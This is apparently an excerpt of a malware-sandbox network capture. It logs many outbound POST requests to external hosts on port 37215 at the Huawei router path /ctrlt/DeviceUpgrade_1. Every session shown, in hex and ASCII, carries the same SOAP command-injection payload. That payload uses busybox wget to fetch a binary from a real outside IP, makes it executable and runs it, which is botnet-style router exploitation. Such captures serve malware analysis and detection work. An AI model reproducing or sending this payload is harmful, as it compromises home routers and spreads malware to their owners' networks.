                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1772192.168.2.1549542197.143.169.23537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.464799881 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1773192.168.2.1550890197.16.215.8037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.464804888 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1774192.168.2.1555714197.18.130.18237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.464870930 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1775192.168.2.155640641.138.126.4937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.464890957 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1776192.168.2.1560720197.218.27.5637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.464919090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1777192.168.2.155483241.255.114.15537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.464919090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1778192.168.2.153673041.205.201.25037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.464939117 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1779192.168.2.154902641.33.149.25437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.464984894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1780192.168.2.153460841.223.18.3437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465001106 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1781192.168.2.1535946197.50.122.17337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465009928 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 